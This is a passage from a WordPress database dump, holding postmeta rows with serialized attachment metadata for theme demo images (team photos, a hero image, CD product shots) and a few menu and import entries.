nail\";a:4:{s:4:\"file\";s:17:\"team1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"team1-300x188.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:188;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:17:\"team1-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:17:\"team1-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(150,1231,'_wp_attached_file','2016/02/team2.jpg'),(151,1231,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:400;s:4:\"file\";s:17:\"2016/02/team2.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"team2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"team2-300x188.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:188;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:17:\"team2-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:17:\"team2-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(152,1232,'_wp_attached_file','2016/02/team3.jpg'),(153,1232,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:400;s:4:\"file\";s:17:\"2016/02/team3.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"team3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"team3-300x188.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:188;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:17:\"team3-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:17:\"team3-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(154,1233,'_wp_attached_file','2016/02/team4.jpg'),(155,1233,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:400;s:4:\"file\";s:17:\"2016/02/team4.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"team4-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"team4-300x188.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:188;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:17:\"team4-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:17:\"team4-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(156,1234,'_wp_attached_file','2016/02/team5.jpg'),(157,1234,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:400;s:4:\"file\";s:17:\"2016/02/team5.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"team5-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"team5-300x188.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:188;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:17:\"team5-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:17:\"team5-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(429,1303,'_menu_item_target',''),(425,1303,'_menu_item_type','custom'),(426,1303,'_menu_item_menu_item_parent','0'),(427,1303,'_menu_item_object_id','1303'),(428,1303,'_menu_item_object','custom'),(160,1235,'_wp_attached_file','2016/02/team7.jpg'),(161,1235,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:400;s:4:\"file\";s:17:\"2016/02/team7.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"team7-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"team7-300x188.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:188;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:17:\"team7-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:17:\"team7-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(162,1236,'_wp_attached_file','2016/02/team8.jpg'),(163,1236,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:400;s:4:\"file\";s:17:\"2016/02/team8.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"team8-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"team8-300x188.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:188;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:17:\"team8-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:17:\"team8-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(164,1237,'_wp_attached_file','2016/02/hero4.jpg'),(165,1237,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1500;s:6:\"height\";i:997;s:4:\"file\";s:17:\"2016/02/hero4.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"hero4-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"hero4-300x199.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:199;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:17:\"hero4-768x510.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:510;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:18:\"hero4-1024x681.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:681;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:17:\"hero4-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:17:\"hero4-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:17:\"hero4-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(166,85,'_wp_attached_file','2013/06/cd_1_flat.jpg'),(167,85,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1000;s:6:\"height\";i:1000;s:4:\"file\";s:21:\"2013/06/cd_1_flat.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"cd_1_flat-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"cd_1_flat-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"cd_1_flat-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:21:\"cd_1_flat-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:21:\"cd_1_flat-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:21:\"cd_1_flat-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(168,85,'_wxr_import_parent','83'),(169,88,'_wp_attached_file','2013/06/cd_2_angle.jpg'),(170,88,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1000;s:6:\"height\";i:1000;s:4:\"file\";s:22:\"2013/06/cd_2_angle.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"cd_2_angle-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"cd_2_angle-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"cd_2_angle-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:22:\"cd_2_angle-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:22:\"cd_2_angle-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:22:\"cd_2_angle-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(171,88,'_wxr_import_parent','87'),(172,89,'_wp_attached_file','2013/06/cd_2_flat.jpg'),(173,89,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1000;s:6:\"height\";i:1000;s:4:\"file\";s:21:\"2013/06/cd_2_flat.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"cd_2_flat-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"cd_2_flat-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"cd_2_flat-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:21:\"cd_2_flat-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:21:\"cd_2_flat-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:21:\"cd_2_flat-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(174,89,'_wxr_import_parent','87'),(175,91,'_wp_attached_file','2013/06/cd_3_angle.jpg'),(176,91,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1000;s:6:\"height\";i:1000;s:4:\"file\";s:22:\"2013/06/cd_3_angle.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"cd_3_angle-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"cd_3_angle-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"cd_3_angle-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:22:\"cd_3_angle-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:22:\"cd_3_angle-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:22:\"cd_3_angle-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(177,91,'_wxr_import_parent','90'),(178,92,'_wp_attached_file','2013/06/cd_3_flat.jpg'),(179,92,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1000;s:6:\"height\";i:1000;s:4:\"file\";s:21:\"2013/06/cd_3_flat.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"cd_3_flat-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"cd_3_flat-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"cd_3_flat-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:21:\"cd_3_flat-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:21:\"cd_3_flat-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:21:\"cd_3_flat-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(180,92,'_wxr_import_parent','90'),(181,94,'_wp_attached_file','2013/06/cd_4_flat.jpg'),(182,94,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1000;s:6:\"height\";i:1000;s:4:\"file\";s:21:\"2013/06/cd_4_flat.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"cd_4_flat-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"cd_4_flat-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"cd_4_flat-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:21:\"cd_4_flat-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:21:\"cd_4_flat-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:21:\"cd_4_flat-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(183,94,'_wxr_import_parent','93'),(184,95,'_wp_attached_file','2013/06/cd_4_angle.jpg'),(185,95,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1000;s:6:\"height\";i:1000;s:4:\"file\";s:22:\"2013/06/cd_4_angle.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"cd_4_angle-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"cd_4_angle-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"cd_4_angle-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:22:\"cd_4_angle-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:22:\"cd_4_angle-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:22:\"cd_4_angle-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(186,95,'_wxr_import_parent','93'),(187,97,'_wp_attached_file','2013/06/cd_5_angle.jpg'),(188,97,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1000;s:6:\"height\";i:1000;s:4:\"file\";s:22:\"2013/06/cd_5_angle.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"cd_5_angle-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"cd_5_angle-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"cd_5_angle-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:22:\"cd_5_angle-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:22:\"cd_5_angle-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:22:\"cd_5_angle-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(189,97,'_wxr_import_parent','96'),(190,98,'_wp_attached_file','2013/06/cd_5_flat.jpg'),(191,98,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1000;s:6:\"height\";i:1000;s:4:\"file\";s:21:\"2013/06/cd_5_flat.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"cd_5_flat-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"cd_5_flat-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"cd